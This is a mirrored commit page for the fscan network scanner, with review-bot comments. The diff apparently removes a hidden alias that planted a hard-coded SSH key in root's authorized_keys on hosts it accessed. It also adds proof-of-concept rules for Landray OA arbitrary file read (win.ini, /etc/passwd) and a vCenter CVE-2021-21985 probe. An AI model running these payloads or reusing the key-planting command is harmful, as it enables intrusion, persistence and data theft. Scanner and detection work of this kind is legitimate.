mirror of https://github.com/qwqdanchun/fscan.git
更新poc
parent
a8835a9fe4
commit
ad1c53e3f4
|
@ -74,9 +74,6 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
|
|||
flag = true
|
||||
var result string
|
||||
if info.Command != "" {
|
||||
if info.Command == "shadow" {
|
||||
info.Command = "mkdir dir /root/.ssh/ && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDkQQuWtmLm0eEhogGubMFh2/qv21aQV1tzbRjySPNQJRig479hMre48jxWDzB71WdEU2vg+ns8/0s3jqcGAx5lJaneH1ovLRNdIq4PkfmJPSMCEibGoNVS47rvfrv4QgECnbAt3azklnvniDvZiP5KjBQS9z57Ni2WVDC1SHNy1PDVMGYMJxZZ8kVKP7LRDbiOKJsSplHV/qP3NGZkdKh7OUYBx8A7+S3vT9c3AMSmk74Z2ibU0sddlngf0hLOxbTRiJV+OsgQQOfnttZvA7LoxbCiMtpzKGLOLAHXD8Hx5okXkx8cGOjc+Fcr6s2eQ10BLGPO4LPYWQ+G91xj+VF7 sysadmin\">> /root/.ssh/authorized_keys"
|
||||
}
|
||||
combo, _ := session.CombinedOutput(info.Command)
|
||||
result = fmt.Sprintf("[+] SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
|
||||
if info.SshKey != "" {
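Review bot: The remaining `combo, _ := session.CombinedOutput(info.Command)` discards the error, so a command that fails or exits non-zero is still reported as `[+] SSH:...` with whatever partial output came back. Keep it and surface it, e.g. `combo, cmdErr := session.CombinedOutput(info.Command)`, appending `cmdErr` to the result when it is non-nil. The header counts (9 old lines, 6 new) suggest the three lines of the `shadow` alias are what this commit removes, although the +/- markers are lost on this page. That alias rewrote the command to append a hard-coded `ssh-rsa ... sysadmin` key to `/root/.ssh/authorized_keys`, and the commit message does not mention it. A changelog entry would let operators who ran earlier builds check their hosts' `authorized_keys` for that key; SshConn's body starts and ends outside the hunk.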
|
||||
|
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,11 @@
|
|||
name: poc-yaml-landray-oa-custom-jsp-fileread
|
||||
rules:
|
||||
- method: POST
|
||||
path: /sys/ui/extend/varkind/custom.jsp
|
||||
body: var={"body":{"file":"file:///c://windows/win.ini"}}
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"for 16-bit app support")
|
||||
detail:
|
||||
author: B1anda0(https://github.com/B1anda0)
|
||||
links:
|
||||
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
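Review bot: Both new landray files declare the same `name: poc-yaml-landray-oa-custom-jsp-fileread` (this one matching on `win.ini`, the next section on `/etc/passwd`), so a hit in the scan output does not say which variant matched, and a loader keyed on name may keep only one of them. Distinct names such as `poc-yaml-landray-oa-custom-jsp-fileread-win` and `poc-yaml-landray-oa-custom-jsp-fileread-linux` would fix that. A `description:` under `detail` naming the affected product and the file each variant reads would also help whoever triages the finding.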
|
|
@ -0,0 +1,11 @@
|
|||
name: poc-yaml-landray-oa-custom-jsp-fileread
|
||||
rules:
|
||||
- method: POST
|
||||
path: /sys/ui/extend/varkind/custom.jsp
|
||||
body: var={"body":{"file":"file:///etc/passwd"}}
|
||||
expression: |
|
||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||||
detail:
|
||||
author: B1anda0(https://github.com/B1anda0)
|
||||
links:
|
||||
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
|
|
@ -0,0 +1,17 @@
|
|||
name: poc-yaml-vmware-vcenter-cve-2021-21985-rce
|
||||
rules:
|
||||
- method: POST
|
||||
path: /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
body: |-
|
||||
{"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}\x0d\x0a
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"result")
|
||||
detail:
|
||||
vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"
|
||||
author: envone77
|
||||
description: "vmware vCenter unauth RCE cve-2021-21985"
|
||||
links:
|
||||
- https://www.anquanke.com/post/id/243098
|
||||
- https://github.com/alt3kx/CVE-2021-21985_PoC
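Review bot: The match `response.body.bcontains(b"result")` is loose enough that any 200 response containing the word "result" (a login page, a WAF block page, a generic JSON error) is reported as CVE-2021-21985, so findings from this rule need manual confirmation. Tightening the expression, for example by also requiring a JSON content type if the rule engine exposes one, would cut false positives. Separately, `\x0d\x0a` inside a `|-` block scalar is not an escape in YAML and is sent as eight literal characters unless the loader post-processes it. A comment saying whether that is intended would help.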
|
|
@ -11,7 +11,7 @@ func Banner() {
|
|||
/ /_\/____/ __|/ __| '__/ _` + "`" + ` |/ __| |/ /
|
||||
/ /_\\_____\__ \ (__| | | (_| | (__| <
|
||||
\____/ |___/\___|_| \__,_|\___|_|\_\
|
||||
fscan version: 1.6.2
|
||||
fscan version: 1.6.3
|
||||
`
|
||||
print(banner)
|
||||
}
|
||||
|
|